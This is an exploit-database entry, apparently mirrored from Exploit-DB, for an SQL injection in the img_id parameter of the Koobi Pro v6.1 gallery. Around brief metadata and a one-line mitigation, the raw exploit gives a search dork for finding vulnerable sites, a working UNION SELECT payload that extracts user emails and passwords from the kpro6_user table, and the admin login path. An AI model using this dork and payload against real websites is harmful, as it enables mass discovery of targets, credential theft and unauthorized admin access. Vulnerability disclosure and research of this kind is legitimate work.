header-logo
Suggest Exploit
vendor:
Koobi Pro
by:
Bilge Kagan
9.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Koobi Pro
Affected Version From: Koobi Pro v6.1
Affected Version To: Koobi Pro v6.1
Patch Exists: No
Related CWE: N/A
CPE: a:koobi:koobi_pro:6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Koobi Pro v6.1 gallery (img_id)

This exploit allows an attacker to gain access to the admin panel of Koobi Pro v6.1 gallery by exploiting a SQL injection vulnerability in the img_id parameter of the index.php page. The attacker can use the DORK 1 to find vulnerable websites and then use the EXPLOiT to gain access to the admin panel.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries and input validation to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##########################################
#
# Koobi Pro v6.1 gallery (img_id)
#

##########################################
#
##AUTHOR : BILGE_KAGAN
#
####HOME : http://www.1923turk.biz
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+kpro6_user


aDM�N PANEL�:

admin/login.php

Navigation

Suggest Exploit

Services By CQR